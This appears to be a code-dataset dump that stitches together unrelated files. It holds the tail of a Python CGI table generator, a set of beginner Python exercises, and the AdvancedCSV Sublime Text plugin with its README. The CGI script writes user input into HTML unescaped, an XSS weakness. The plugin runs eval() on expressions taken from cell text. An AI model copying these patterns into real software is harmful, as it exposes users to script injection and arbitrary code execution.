/usr/bin/python3\nimport cgi\nimport os\ntext1 = \"\"\ntext2 = \"\"\ntable = \"\"\nflag = 0\nform = cgi.FieldStorage()\nif os.environ[\"REQUEST_METHOD\"] == \"POST\":\n if \"text\" in form:\n text = form[\"text\"].value\n flag += 1\n else:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The variables 'text' and 'size' are both required\"\n if \"size\" in form:\n size = form[\"size\"].value\n try:\n size = int(size)\n flag += 1\n except ValueError:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The 'size' variable must be an integer\"\n else:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The variables 'text' and 'size' are both required\"\nelse:\n text1 = \"Status: 405 Method Not Allowed\"\n text2 = \"Allow: POST\"\nif flag==2:\n for i in range(size):\n table += \"<tr>\"\n if i%2==0:\n for e in range(size):\n if e%2 == 0:\n table += \"<td>\" + text + \"</td>\"\n else:\n table += \"<td></td>\"\n else:\n for e in range(size):\n if e%2 == 0:\n table += \"<td></td>\"\n else:\n table += \"<td>\" + text + \"</td>\"\n table += \"</tr>\"\nprint (\"Content-type:text/html\\r\\n\\r\\n\")\nprint ('<html>')\nprint ('<head>')\nprint ('<title>Random</title>')\nprint ('</head>')\nprint ('<body>')\nprint ('<table>')\nprint ('%s' % table)\nprint ('</table>')\nprint ('<p>%s</p>' % text1)\nprint ('<br>')\nprint ('<p>%s</p>' % text2)\nprint ('</body>')\nprint ('</html>')\n" } ]
2
nickassafkirk/masterclass_python
https://github.com/nickassafkirk/masterclass_python
a21844851b821f3f472260f7079d2914f2a948a9
e557e0c017fdcff112155ea1f4ca6803600670c5
97f1a9b8c38995ca2cdc52d8f6605df03dc3962b
refs/heads/master
2023-04-22T20:06:35.328970
2021-05-05T20:00:32
2021-05-05T20:00:32
364,660,459
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.569399893283844, "alphanum_fraction": 0.586807131767273, "avg_line_length": 19.790475845336914, "blob_id": "c2663baaa76a9b91b9e19fac3a7a92776c5ea87b", "content_id": "adc34a3e00c69277a2513cf662cf6971aeab2ff5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2183, "license_type": "no_license", "max_line_length": 70, "num_lines": 105, "path": "/run.py", "repo_name": "nickassafkirk/masterclass_python", "src_encoding": "UTF-8", "text": "\n# Question 1\n\nnums = [1,1,3,4,5]\n\ndef check_duplicates(list):\n \"\"\"\n Converts list to set and compares lengths of list and set\n to evaluate if duplicates are present. \n If duplicates are present the set will be shorter.\n \"\"\"\n compare = set(nums)\n\n if len(compare) == len(nums):\n return True\n else:\n return False\n\n# Question 3 \n\ndef reverse_order(string):\n \"\"\"\n Takes input of list, reverse list \n and converts to string\n \"\"\"\n reversed_list = string[::-1]\n convert_to_string = \"\"\n final = convert_to_string.join(reversed_list)\n return(final)\n\ntest = [\"s\",\"t\",\"r\",\"i\",\"n\",\"g\"]\nprint(reverse_order(test))\n\n# Question 4\n\ndef palindrome(word):\n \"\"\"\n Takes string as input and ingores non alpha\n characters.\n Compares equality between inputted word and reversed word\n to determine if palindrome\n \"\"\"\n remove_special_chars = \"\"\n\n for charachter in word:\n if charachter.isalpha():\n remove_special_chars += charachter\n\n forward = remove_special_chars.lower()\n backward = remove_special_chars[::-1].lower()\n\n if forward == backward:\n print(f\"The word: {remove_special_chars} is a palindrome\")\n else:\n print(f\"The word: {remove_special_chars} is not a palindrome\")\n\n\npalindrome(\"navan123\")\n\n# Question 5:\n\ndef fizz_buzz(n):\n if n % 3 == 0 and n % 5 == 0:\n return \"Fizzbuzz\"\n elif n % 3 == 0:\n return \"Fizz\"\n elif n % 5 == 0:\n return \"Buzz\"\n else:\n return n 
\n\nprint(fizz_buzz(15))\n\n# Question 6:\n\ndef optimus_prime(n):\n \"\"\"\n Takes each number up to elected integer\n and check if it is prime. \n If it is it is counted if not it is skipped.\n \"\"\"\n count = 0\n for num in range(1,n):\n if num <= 1:\n continue\n for i in range(2,num):\n if (num % i) == 0:\n break\n else:\n count += 1\n print(count)\n\noptimus_prime(7)\n\n# Question 7\n\ndef swap_numbers(number):\n \"\"\"\n converts number to string,\n reverses number.\n Then converts number back to int\n \"\"\"\n new_number = str(number)\n print(int(new_number[::-1]))\n\nswap_numbers(2557)" } ]
1
evandroforks/AdvancedCSV
https://github.com/evandroforks/AdvancedCSV
1d5497f90238072c3486771ca84b49605b6b3598
c9d452d372e1e2ff85a459005b0e7c7d6a403add
133906a5a9cf6fbdc71bbf410fe1f2e99f373101
refs/heads/master
2023-09-04T02:31:57.282333
2021-10-13T06:10:06
2021-10-13T06:10:06
94,725,612
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5675785541534424, "alphanum_fraction": 0.572009265422821, "avg_line_length": 32.653900146484375, "blob_id": "5b14461388f8a0cec8fef33d3f7bd87e9e596dcb", "content_id": "88714f4e1625143c97584f67128d2c954d7dfa4e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24601, "license_type": "permissive", "max_line_length": 148, "num_lines": 731, "path": "/csvplugin.py", "repo_name": "evandroforks/AdvancedCSV", "src_encoding": "UTF-8", "text": "# Originally written by Eric Martel ([email protected] / www.ericmartel.com)\n# Improved by Wade Brainerd ([email protected] / www.wadeb.com)\n\nimport sublime\nimport sublime_plugin\n\nimport fnmatch, os, re, sys\nfrom math import *\n\n# http://stackoverflow.com/questions/11301138/how-to-check-if-variable-is-string-with-python-2-and-3-compatibility\ntry:\n isinstance(\"\", basestring)\n def isstr(s):\n return isinstance(s, basestring)\nexcept NameError:\n def isstr(s):\n return isinstance(s, str)\n\nsys.path.append(__package__)\n\n\nfrom .tinynumpy import tinynumpy\ng_print_numpy_import_error = False\n\ntry:\n import numpy\nexcept ImportError:\n numpy = tinynumpy\n # g_print_numpy_import_error = True\n\ndef numpy_import_error():\n print(\"=== NumPy disabled, using TinyNumPy instead ===\")\n print(\"To enable cell evaluation using the full NumPy, download NumPy from:\")\n print(\" https://pypi.python.org/pypi/numpy\")\n print(\"and install it into Sublime Text's Packages directory.\")\n print(\"For information on the features and limitations of TinyNumPy, visit:\")\n print(\" https://github.com/wadetb/tinynumpy\")\n print(\"======================\")\n\ndef plugin_loaded():\n\n if g_print_numpy_import_error:\n numpy_import_error()\n\nclass SortDirection:\n Ascending = 1\n Descending = 2\n\nclass CSVValue:\n def __init__(self, text, first_char_index=0, last_char_index=0):\n self.text = text\n self.first_char_index = first_char_index\n 
self.last_char_index = last_char_index\n\n def AsFloat(self):\n try:\n return True, float(self.text)\n except ValueError:\n return False, None\n\n def Compare(self, other):\n a_is_float, a_float = self.AsFloat()\n b_is_float, b_float = other.AsFloat()\n\n if a_is_float and b_is_float:\n return a_float - b_float\n\n if self.text > other.text:\n return 1\n if self.text < other.text:\n return -1\n return 0\n\n def __lt__(self, other): return self.Compare(other) < 0\n def __eq__(self, other): return self.Compare(other) == 0\n\nclass CSVMatrix:\n def __init__(self, view):\n self.rows = []\n self.num_columns = 0\n self.valid = False\n self.view = view\n\n self.settings = sublime.load_settings('AdvancedCSV.sublime-settings')\n\n self.ChooseDelimiter()\n\n self.auto_quote = self.GetViewOrUserSetting( 'auto_quote', True )\n\n def GetViewOrUserSetting(self, name, default):\n if self.view.settings().has(name):\n return self.view.settings().get(name)\n else:\n return self.settings.get(name, default)\n\n def ChooseDelimiter(self):\n self.delimiter = None\n\n # Highest priority: per-view saved setting (CSV -> Set Delimiter).\n if self.view.settings().has('delimiter'):\n self.delimiter = self.view.settings().get('delimiter')\n\n # Second highest priority: filename-based matching\n if not self.delimiter:\n filename = self.view.file_name()\n\n if filename:\n self.delimiter_mapping = self.settings.get('delimiter_mapping', {})\n for k, v in self.delimiter_mapping.items():\n if fnmatch.fnmatch(filename, k):\n self.delimiter = v\n break\n\n # Final priority: user or system setting, fallback to comma.\n if not self.delimiter:\n self.delimiter = self.settings.get('delimiter', ',')\n\n # Special case for recognizing '\\t' for tabs.\n if self.delimiter == '\\\\t':\n self.delimiter = '\\t'\n\n if not isstr(self.delimiter) or len(self.delimiter) != 1:\n print(\"'{0}' is not a valid delimiter, reverting to ','.\".format(self.delimiter))\n self.delimiter = ','\n\n print(\"Using delimiter: 
'{0}'.\".format(self.delimiter))\n\n def AddRow(self, row):\n self.rows.append(row)\n\n def Finalize(self):\n if not len(self.rows):\n return\n\n self.num_columns = 0\n for row in self.rows:\n if len(row) > self.num_columns:\n self.num_columns = len(row)\n\n self.valid = True\n\n @staticmethod\n def GetCellValue(row, column_index):\n try:\n return row[column_index]\n except IndexError:\n return CSVValue('')\n\n def SortByColumn(self, column_index, direction, use_header):\n class Compare:\n def __init__(self, row): self.value = CSVMatrix.GetCellValue(row, column_index)\n def __lt__(self, other): return self.value < other.value\n def __eq__(self, other): return self.value == other.value\n\n reverse = direction == SortDirection.Descending\n\n if use_header:\n self.rows[1:] = sorted(self.rows[1:], key=lambda row: Compare(row), reverse=reverse)\n else:\n self.rows.sort(key=lambda row: Compare(row), reverse=reverse)\n\n def InsertColumn(self, column_index):\n for row in self.rows:\n if column_index <= len(row):\n row.insert(column_index, CSVValue(''))\n\n def DeleteColumn(self, column_index):\n for row in self.rows:\n if column_index < len(row):\n row.pop(column_index)\n\n def DeleteTrailingColumns(self, column_index):\n for row in self.rows:\n last_column_index = 0\n\n for column_index, value in enumerate(row):\n if len(value.text.strip()) > 0:\n last_column_index = column_index\n\n first_empty_column_index = last_column_index + 1\n del row[first_empty_column_index:]\n\n def SelectColumn(self, column_index, view):\n view.sel().clear()\n\n for row_index, row in enumerate(self.rows):\n if column_index < len(row):\n value = row[column_index]\n a = view.text_point(row_index, value.first_char_index)\n b = view.text_point(row_index, value.last_char_index)\n\n region = sublime.Region(a, b)\n view.sel().add(region)\n\n @staticmethod\n def SaveSelection(view):\n saved_selection = []\n\n for region in view.sel():\n a_row, a_col = view.rowcol(region.a)\n b_row, b_col = 
view.rowcol(region.b)\n\n rowcol_region = (a_row, a_col, b_row, b_col)\n\n saved_selection.append(rowcol_region)\n\n return saved_selection\n\n @staticmethod\n def RestoreSelection(view, saved_selection):\n view.sel().clear()\n\n for rowcol_region in saved_selection:\n a = view.text_point(rowcol_region[0], rowcol_region[1])\n b = view.text_point(rowcol_region[2], rowcol_region[3])\n\n region = sublime.Region(a, b)\n view.sel().add(region)\n\n def QuoteText(self, text):\n if not self.auto_quote:\n return text\n if self.delimiter in text or '\"' in text:\n return '\"' + text.replace('\"', '\"\"') + '\"'\n else:\n return text\n\n def MeasureColumns(self):\n self.column_widths = [0] * self.num_columns\n\n for row in self.rows:\n for column_index, value in enumerate(row):\n text = self.QuoteText(value.text)\n width = len(text)\n\n if width > self.column_widths[column_index]:\n self.column_widths[column_index] = width\n\n def Format(self):\n output = ''\n\n for row_index, row in enumerate(self.rows):\n row_text = ''\n\n for column_index, value in enumerate(row):\n quoted_text = self.QuoteText(value.text)\n\n row_text += quoted_text\n\n if column_index < len(row) - 1:\n row_text += self.delimiter\n\n output += row_text\n\n if row_index < len(self.rows) - 1:\n output += '\\n'\n\n return output\n\n def FormatCompacted(self):\n output = ''\n\n for row_index, row in enumerate(self.rows):\n row_text = ''\n\n for column_index, value in enumerate(row):\n quoted_trimmed_text = self.QuoteText(value.text.strip())\n\n row_text += quoted_trimmed_text\n\n if column_index < len(row) - 1:\n row_text += self.delimiter\n\n output += row_text\n\n if row_index < len(self.rows) - 1:\n output += '\\n'\n\n return output\n\n def FormatExpanded(self):\n self.MeasureColumns()\n\n output = ''\n\n for row_index, row in enumerate(self.rows):\n row_text = ''\n\n for column_index, value in enumerate(row):\n quoted_text = self.QuoteText(value.text)\n\n column_width = 
self.column_widths[column_index]\n\n quoted_padded_text = quoted_text.ljust(column_width)\n\n row_text += quoted_padded_text\n\n if column_index < len(row) - 1:\n row_text += self.delimiter\n\n output += row_text\n\n if row_index < len(self.rows) - 1:\n output += '\\n'\n\n return output\n\n def ParseRow(self, row):\n columns = []\n\n currentword = ''\n first_char_index = 0\n insidequotes = False\n\n char_index = 0\n while char_index < len(row):\n char = row[char_index]\n\n if insidequotes:\n if char == '\"':\n if char_index < len(row) - 1 and row[char_index + 1] == '\"':\n if self.auto_quote:\n currentword += '\"'\n else:\n currentword += '\"\"'\n char_index += 2\n continue\n\n insidequotes = False\n if not self.auto_quote:\n currentword += char\n\n else:\n currentword += char\n\n else:\n if char == '\"':\n insidequotes = True\n if not self.auto_quote:\n currentword += char\n\n elif char == self.delimiter:\n columns.append(CSVValue(currentword, first_char_index, char_index))\n currentword = ''\n first_char_index = char_index + 1\n\n else:\n currentword += char\n\n char_index += 1\n\n columns.append(CSVValue(currentword, first_char_index, char_index))\n\n return columns\n\n @staticmethod\n def FromView(view):\n matrix = CSVMatrix(view)\n\n text = view.substr(sublime.Region(0, view.size()))\n\n for line in text.split(\"\\n\"):\n row = matrix.ParseRow(line)\n\n matrix.AddRow(row)\n\n matrix.Finalize()\n\n return matrix\n\n def GetColumnIndexFromCursor(self, view):\n selection = view.sel()[0]\n\n row_index, col_index = view.rowcol(selection.begin())\n\n if row_index < len(self.rows):\n row = self.rows[row_index]\n\n for column_index, value in enumerate(row):\n if value.first_char_index > col_index:\n return column_index - 1\n\n return len(row) - 1\n\n else:\n return 0\n\n EXPRESSION_RE = re.compile(r'''\n \\s*\n (\\[\n (?P<row_begin_mod>[+-])?\n (?P<row_begin>\\d+)?\n (?P<row_delim>:)?\n (?P<row_end_mod>[+-])?\n (?P<row_end>\\d+)?\n (?P<comma>,)?\n 
(?P<column_begin_mod>[+-])?\n (?P<column_begin>\\d+)?\n (?P<column_delim>:)?\n (?P<column_end_mod>[+-])?\n (?P<column_end>\\d+)?\n \\])?\n \\s*\n (?P<direction>[<>v^])?\n \\s*\n =\n \\s*\n (?P<expression>.+)\n ''', re.VERBOSE)\n\n def ApplyModifier(self, value, mod, base_value):\n if mod == '+':\n return base_value + value\n elif mod == '-':\n return base_value - value\n else:\n return value\n\n def GetCoordinateRange(self, begin_mod, begin, delim, end_mod, end, base_value):\n if delim:\n if begin is None:\n begin = 0\n else:\n begin = self.ApplyModifier(int(begin), begin_mod, base_value)\n if end is None:\n end = len(self.rows)\n else:\n end = self.ApplyModifier(int(end), end_mod, base_value)\n else:\n if begin is None:\n begin = base_value\n end = base_value + 1\n else:\n begin = self.ApplyModifier(int(begin), begin_mod, base_value)\n end = begin + 1\n\n return (begin, end)\n\n def GetRowColumnCoordinateRange(self, coordinate_match, base_row_index, base_column_index):\n row_begin_mod = coordinate_match.group('row_begin_mod')\n row_begin = coordinate_match.group('row_begin')\n row_delim = coordinate_match.group('row_delim')\n row_end_mod = coordinate_match.group('row_end_mod')\n row_end = coordinate_match.group('row_end')\n\n row_range = self.GetCoordinateRange(row_begin_mod, row_begin, row_delim, row_end_mod, row_end, base_row_index)\n\n column_begin_mod = coordinate_match.group('column_begin_mod')\n column_begin = coordinate_match.group('column_begin')\n column_delim = coordinate_match.group('column_delim')\n column_end_mod = coordinate_match.group('column_end_mod')\n column_end = coordinate_match.group('column_end')\n\n column_range = self.GetCoordinateRange(column_begin_mod, column_begin, column_delim, column_end_mod, column_end, base_column_index)\n\n return (row_range[0], row_range[1], column_range[0], column_range[1])\n\n def ApplyDirectionOffsetToRange(self, direction_match, coord_range):\n direction = direction_match.group('direction')\n\n if direction == 
'^':\n return (coord_range[0] - 1, coord_range[1] - 1, coord_range[2], coord_range[3])\n elif direction == 'v':\n return (coord_range[0] + 1, coord_range[1] + 1, coord_range[2], coord_range[3])\n elif direction == '<':\n return (coord_range[0], coord_range[1], coord_range[2] - 1, coord_range[3] - 1)\n elif direction == '>':\n return (coord_range[0], coord_range[1], coord_range[2] + 1, coord_range[3] + 1)\n else:\n return coord_range\n\n def EvaluateExpressionCell(self, m, row_index, column_index, value, expression_match):\n target_range = self.GetRowColumnCoordinateRange(expression_match, row_index, column_index)\n\n target_range = self.ApplyDirectionOffsetToRange(expression_match, target_range)\n\n expression = expression_match.group('expression')\n\n # Expand sheet for target range.\n while target_range[1] >= len(self.rows):\n self.rows.append([])\n while target_range[3] >= len(self.column_widths):\n self.column_widths.append(0)\n\n for target_row_index in range(target_range[0], target_range[1]):\n for target_column_index in range(target_range[2], target_range[3]):\n try:\n l = {}\n l['m'] = m\n l['row'] = target_row_index\n l['col'] = target_column_index\n l['frow'] = row_index\n l['fcol'] = column_index\n result = eval(str(expression), None, l)\n\n except Exception as e:\n print(\"Exception '{0}' evaluating expression for target cell [{1}, {2}].\".format(str(e), target_row_index, target_column_index))\n result = str(e)\n\n try:\n row = self.rows[target_row_index]\n\n while target_column_index >= len(row):\n row.append(CSVValue(''.ljust(self.column_widths[len(row)])))\n\n target_value = self.rows[target_row_index][target_column_index]\n target_value.text = str(result).ljust(len(target_value.text))\n\n except IndexError:\n print(\"Invalid expression target cell [{0}, {1}].\".format(target_row_index, target_column_index))\n\n def Evaluate(self):\n if not numpy:\n print(\"Cannot evaluate without NumPy.\")\n return\n\n self.MeasureColumns()\n\n dimensions = 
(len(self.rows), self.num_columns)\n\n m = numpy.zeros(dimensions)\n\n for row_index, row in enumerate(self.rows):\n for column_index, value in enumerate(row):\n is_float, float_value = value.AsFloat()\n if is_float:\n m[row_index,column_index] = float_value\n\n for row_index, row in enumerate(self.rows):\n for column_index, value in enumerate(row):\n expression_match = CSVMatrix.EXPRESSION_RE.match(value.text)\n if expression_match:\n self.EvaluateExpressionCell(m, row_index, column_index, value, expression_match)\n\nclass CsvSetOutputCommand(sublime_plugin.TextCommand):\n def run(self, edit, **args):\n if 'output' in args:\n self.view.replace(edit, sublime.Region(0, self.view.size()), args['output']);\n\n if 'saved_selection' in args:\n CSVMatrix.RestoreSelection(self.view, args['saved_selection'])\n\nclass CsvSortByColAscCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.matrix = CSVMatrix.FromView(self.view)\n if not self.matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n self.saved_selection = self.matrix.SaveSelection(self.view)\n\n self.view.window().show_quick_panel(['Use header row', 'Don\\'t use header row'], self.on_select_header_done)\n\n def on_select_header_done(self, picked):\n if picked < 0:\n return\n use_header = picked == 0\n\n column_index = self.matrix.GetColumnIndexFromCursor(self.view)\n self.matrix.SortByColumn(column_index, SortDirection.Ascending, use_header)\n output = self.matrix.Format()\n\n self.view.run_command('csv_set_output', {'output': output, 'saved_selection': self.saved_selection})\n\nclass CsvSortByColDescCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.matrix = CSVMatrix.FromView(self.view)\n if not self.matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n self.saved_selection = self.matrix.SaveSelection(self.view)\n\n self.view.window().show_quick_panel(['Use header row', 
'Don\\'t use header row'], self.on_select_header_done)\n\n def on_select_header_done(self, picked):\n if picked < 0:\n return\n use_header = picked == 0\n\n column_index = self.matrix.GetColumnIndexFromCursor(self.view)\n self.matrix.SortByColumn(column_index, SortDirection.Descending, use_header)\n output = self.matrix.Format()\n\n self.view.run_command('csv_set_output', {'output': output, 'saved_selection': self.saved_selection})\n\nclass CsvInsertColCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n column_index = matrix.GetColumnIndexFromCursor(self.view)\n matrix.InsertColumn(column_index)\n\n output = matrix.Format()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvDeleteColCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n column_index = matrix.GetColumnIndexFromCursor(self.view)\n matrix.DeleteColumn(column_index)\n\n output = matrix.Format()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvDeleteTrailingColsCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n column_index = matrix.GetColumnIndexFromCursor(self.view)\n matrix.DeleteTrailingColumns(column_index)\n\n output = matrix.Format()\n\n self.view.replace(edit, 
sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvSelectColCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n\n column_index = matrix.GetColumnIndexFromCursor(self.view)\n matrix.SelectColumn(column_index, self.view)\n\nclass CsvFormatCompactCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n output = matrix.FormatCompacted()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvFormatExpandCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n output = matrix.FormatExpanded()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvEvaluateCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n matrix = CSVMatrix.FromView(self.view)\n if not matrix.valid:\n sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n saved_selection = matrix.SaveSelection(self.view)\n\n matrix.Evaluate()\n output = matrix.Format()\n\n self.view.replace(edit, sublime.Region(0, self.view.size()), output);\n matrix.RestoreSelection(self.view, saved_selection)\n\nclass CsvFormatCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.matrix = CSVMatrix.FromView(self.view)\n if not self.matrix.valid:\n 
sublime.error_message(__name__ + \": The buffer doesn't appear to be a CSV file\")\n return\n\n self.view.window().show_input_panel('Format (ex. the {0} jumped over the {1})', \"\",\n self.on_done, self.on_change, self.on_cancel)\n\n CELL_RE = re.compile(r'{\\d+}')\n\n def on_done(self, input):\n output = ''\n numrows = len(self.matrix.rows)\n for rowindex, row in enumerate(self.matrix.rows):\n formatted_row = input\n for columnindex, column in enumerate(row):\n formatted_row = formatted_row.replace('{' + str(columnindex) + '}', str(column.text))\n formatted_row = CsvFormatCommand.CELL_RE.sub('', formatted_row)\n output += formatted_row\n if rowindex < (numrows - 1):\n output += '\\n'\n\n view = self.view.window().new_file()\n view.set_name('Formatted Output')\n view.set_scratch(True)\n\n view.run_command('csv_set_output', {'output': output});\n\n def on_change(self, input):\n pass\n\n def on_cancel(self):\n pass\n\nclass CsvSetDelimiterCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.view.window().show_input_panel('Delimiter character', \"\",\n self.on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input):\n self.view.settings().set('delimiter', input)\n\n def on_change(self, input):\n pass\n\n def on_cancel(self):\n pass\n" }, { "alpha_fraction": 0.7167646288871765, "alphanum_fraction": 0.7246944904327393, "avg_line_length": 50.533653259277344, "blob_id": "648efd4e1ecc057db61f12fa8fd2faddfd513d7d", "content_id": "44c2d357e4481aa033d6e32355ec3bc27316d383", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 10721, "license_type": "permissive", "max_line_length": 460, "num_lines": 208, "path": "/README.md", "repo_name": "evandroforks/AdvancedCSV", "src_encoding": "UTF-8", "text": "# Sublime Text Advanced CSV\n\nA plugin to manage CSV files, forked from Eric Martel's Sublime-Text-2-CSV-Plugin at https://github.com/ericmartel/Sublime-Text-2-CSV-Plugin.\n\nIt's often easiest 
to work with CSV data when the columns are properly lined up. This plugin provides a command to line up all the columns using spaces (`Justify columns`) and to collapse them back again (`Collapse columns`).\n\nIt also includes commands to insert and delete columns and to sort data by column, with or without a header row, and respecting numeric order and lexicographical order as appropriate.\n\nAn entire column may be block selected (`Select column`), which enables complex operations like quickly reordering, merging, adding & deleting multiple columns.\n\nThe plugin includes a command to clean up empty trailing commas from rows, which are often left when opening a CSV file in Excel.\n\nUsing NumPy (http://www.numpy.org), the plugin supports evaluating Python expressions over ranges of cells, in a manner similar to formulas in Excel.\n\nAll the above features work in both justified and collapsed modes.\n\nFinally, the plugin fully supports RFC 4180 (https://tools.ietf.org/html/rfc4180) quoting, with the exception that quoted newlines (2.6) are treated as row separators.\n\n## Install\n\n## Installation\n\n### By Package Control\n\n1. Download & Install **`Sublime Text 3`** (https://www.sublimetext.com/3)\n1. Go to the menu **`Tools -> Install Package Control`**, then,\n wait few seconds until the installation finishes up\n1. Now,\n Go to the menu **`Preferences -> Package Control`**\n1. Type **`Add Channel`** on the opened quick panel and press <kbd>Enter</kbd>\n1. Then,\n input the following address and press <kbd>Enter</kbd>\n ```\n https://raw.githubusercontent.com/evandrocoan/StudioChannel/master/channel.json\n ```\n1. Go to the menu **`Tools -> Command Palette...\n (Ctrl+Shift+P)`**\n1. Type **`Preferences:\n Package Control Settings – User`** on the opened quick panel and press <kbd>Enter</kbd>\n1. 
Then,\n find the following setting on your **`Package Control.sublime-settings`** file:\n ```js\n \"channels\":\n [\n \"https://packagecontrol.io/channel_v3.json\",\n \"https://raw.githubusercontent.com/evandrocoan/StudioChannel/master/channel.json\",\n ],\n ```\n1. And,\n change it to the following, i.e.,\n put the **`https://raw.githubusercontent...`** line as first:\n ```js\n \"channels\":\n [\n \"https://raw.githubusercontent.com/evandrocoan/StudioChannel/master/channel.json\",\n \"https://packagecontrol.io/channel_v3.json\",\n ],\n ```\n * The **`https://raw.githubusercontent...`** line must to be added before the **`https://packagecontrol.io...`** one, otherwise,\n you will not install this forked version of the package,\n but the original available on the Package Control default channel **`https://packagecontrol.io...`**\n1. Now,\n go to the menu **`Preferences -> Package Control`**\n1. Type **`Install Package`** on the opened quick panel and press <kbd>Enter</kbd>\n1. Then,\n search for **`AdvancedCSV`** and press <kbd>Enter</kbd>\n\nSee also:\n\n1. [ITE - Integrated Toolset Environment](https://github.com/evandrocoan/ITE)\n1. 
[Package control docs](https://packagecontrol.io/docs/usage) for details.\n\n\n## Key bindings\n\nKey | Action\n-------------------- | ---------------------------\n`Ctrl+Comma, Up` | Sort by column (Ascending)\n`Ctrl+Comma, Down` | Sort by column (Descending)\n`Ctrl+Comma, i` | Insert column\n`Ctrl+Comma, d` | Delete column\n`Ctrl+Comma, s` | Select column\n`Ctrl+Comma, Space` | Justify columns\n`Ctrl+Comma, Comma` | Collapse columns\n`Ctrl+Comma, Equals` | Evaluate cells\n`Ctrl+Comma, f` | Format cells using a template string\n\n## Formulas\n\nTo trigger cell evaluation, the contents of a cell must follow a standard pattern:\n\n\t<range>=<python expression...>\n\n`range` defines the set of cells whose contents will be updated, and `python expression` defines the Python expression that will be evaluated.\n\n### Ranges\n\nIf `range` is left blank, the formula cell itself is replaced. Unlike Excel, the formula text is not stored separately from the displayed value, so this has the effect of destroying the formula, though the evaluate command can always be undone if that result is unwanted.\n\n- `=<python expression>` Replaces the current cell with the result of `python expression`.\n\nThe syntax for defining a range other than the formula cell is:\n\n`[<row_start>:<row_end>,<col_start>:<col_end>]=<python expression>`\n\nUpdates a rectangular area of the document from `row_start` to `row_end` and from `col_start` to `col_end`. If `row_start` or `col_start` is omitted, the range starts at the first row or column of the document.\n\nIf `row_end` or `col_end` is omitted, the range ends at the last row or column of the document of the document. If both are omitted but the colon is included, the entire row are column is updated. 
If both numbers and the colon are omitted, the range is the formula's row or column.\n\nHere are all the variations of this syntax:\n\n- `[:]` Updates all cells in the current column.\n- `[<row_start>:<row_end>]` Updates cells in the current column from `row_start` to `row_end`.\n- `[<row_start>:]` Updates cells in the current column from `row_start` to the end of the document.\n- `[:<row_end>]` Updates cells in the current column from the beginning of the document to `row_end`.\n- `[,:]` Updates all cells in the current row.\n- `[,<col_start>:<col_end>]` Updates all cells in the current row from `col_start` to `col_end`.\n- `[,<col_start>:]` Updates all cells in the current row from `col_start` to the end of the document.\n- `[,:<col_end>]` Updates all cells in the current row from the beginning of the document to `col_end`.\n- `[:,:]` Updates all cells in the document.\n- `[:,<col_start>:<col_end>]` Updates cells in all rows from `col_start` to `col_end`.\n- `[:,<col_start>:]` Updates cells in all rows from `col_start` to the end of the document.\n- `[:,:<col_end>]` Updates cells in all rows from the beginning of the document `to col_end`.\n\nWhen defining ranges, the `start` cell is updated, but the `end` cell is not. 
